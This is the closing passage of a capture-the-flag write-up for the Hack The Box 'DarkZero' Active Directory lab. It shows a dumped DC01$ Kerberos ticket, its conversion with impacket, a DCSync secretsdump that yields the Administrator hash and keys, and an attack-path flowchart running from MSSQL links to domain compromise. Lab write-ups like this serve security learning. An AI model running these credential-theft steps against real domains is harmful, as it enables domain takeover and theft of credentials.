ServiceRealm : DARKZERO.HTB
UserName : DC01$ (NT_PRINCIPAL)
UserRealm : DARKZERO.HTB
StartTime : 11/18/2025 1:50:39 PM
EndTime : 11/18/2025 11:50:38 PM
RenewTill : 11/25/2025 1:50:38 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 2zwQkxl1UNmMoa/tVQ5+qBtIi9Xo+jGtSJYIGSMtITA=
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDaFT2qgjC9SbPp3I4XH6mCgFU6b12U7ACV4en01tpesF5HMtF10Jgr8Q8dkDlPt75u8W35TUDiqAsXPVcIAwNtZ/SJE501P0TkMoPrYfvftMKlihf6VHGklA42vkTY0nkJHtmdc8tXvNckuYxC8ff4ebJmfAkvRl9yO65vbrtUB8pWh/BDDO8wfjaT6AHmvUs9sftGfLNWqXA7A2oRVTBw70VPysbi4OJcz7cyQCylSGEJuEnaRmy8BysU6eeDrDIYd/Qf3DJlOD4ZSI1X/2hNmx1NeOrDs8F7KHqkIAso6RihTqomWON4EJcyNzAzqKmF9LUu33gp42KQME4TEADSlQ4y2NpJ4hXEye5MEcz5coWpZSBVRDaD/lQ+/IA7+cnGhSb6Z8dNRNz5T0pprXUs15CDee/m1BSV/4Rz15sQe9iX3BcyInAjPU2kPrRSykawOAGeoojL/Yii87AeLyZOtpe/C3EYOkkZ/upGm3s+3bNpot50ZyPHaGGQ5m5NdPzzzA8uaGSIjm8mp+R6XClUs00fs1CQioibo0HQjGwH53CZD/Pe21OI32WLmz8b0h/NWil9xeMplAjLzyVGBWSmD6ljVcxoEa4SaRLu0tk3bU9o6QBRzvmnhsJaVyhcx4hVJypxGZ4T1+5RaItZqHFF4l9eWR1t6Ljp6miFMYuti6D+RzcwSkVhTCg0wdqRWO6kwb4k3lknKTbOtJkR69Pa5ppjhq9Eq6Ru62pH/SzBCMJy6v43AV05oNDSPqMDPH6nVMo0wIl7yof547C7qRTauxxr/RvSnpr76fUXIDLIj0gXUi3wgS1KUUg3iU5vhBNjfynkBDObp7+gerRAjURNLquozD0o24gXIM4DWVAN6kQT1EuHqNf/KJsII5hgXhA6RAnN1CbXMtyI1GEYVJRss0C3Kn5AGf99t2kuoTQBX8Vois/E4tJcDRvSCSAt+V/yTePprMf9kFZfkC4TAB56V5E+bT79g/Xd6mT7zSc0FTFUfrBllksrNnS8VrmQL4sPZVdVijsVa8h+hPmKXMB2/1Ocf9fVBOl+RDLIyUrrgiysjpFTTTOnHVL/IK6O5m54pHtQii5L3TmAW1ClTU6yXIoz8bWKxFU8mr3LjHwvSqtmpErwB2R0zAdZ3wS+cxHDqacp+vhGaIisxHktjUF64tF/dkArbUUxhebwdWdpwLnaOFMw5Lr1x7DCYYbiKvoCgmMW8vEDOn/j9gnOp2orqRZo64jETr46IhYC8Aj17PONMBsEmoJ4c0vjIjw3jNi5GdEe2LeuYWGJymtwTK8KB5RZqeAQZLd0NJfderSMjQNHWbwLCaWU4xFEiTjFhcu5HU+BlamyDkRmSa4qrt3ZsO3bfpj0FvVLbMfmhh5M1XkSnQYMXz/mrbpIIWu63yiGkJ1X76nBR+sh/i4Y5MzJk5iOJ0FL/o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg2zwQkxl1UNmMoa/tVQ5+qBtIi9Xo+jGtSJYIGSMtITChDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTExMTgyMTUwMzlaphEYDzIwMjUxMTE5MDc1MDM4WqcRGA8yMDI1MTEyNTIxNTAzOFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=What’s left to do is converting the kirbi ticket in base64 into a ccache with ticketConverter and then use this TGT to dump the hash of the Administrator account via DCSync. Then I can get an interactive session on DC01.
$ cat ticket.b64
doIFjDCCBYigAwIBBaE<SNIP>
$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=ticket.ccache
$ faketime -f +7h impacket-secretsdump -k \
-no-pass \
-just-dc-user Administrator \
dc01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
[*] Cleaning up...Attack Path
flowchart TD subgraph "Privilege Escalation" A(Access as john.w) -->|Use Linked MSSQL Server| B(Sysadmin in MSSQL on DC02) B -->|xp_cmdshell| C(Shell as svc_sql) C -->|Reset password through ADCS| D(Known password) D -->|"Perform Service Login (Logon Type 5)"| E(Shell as svc_sql with SeImpersonate) E --> F(Shell as SYSTEM on DC02) A & F -->|Coerce DC01 and dump TGT from memory| G(TGT for DC01$) G -->|secretsdump| H(Shell as Administrator on DC01) end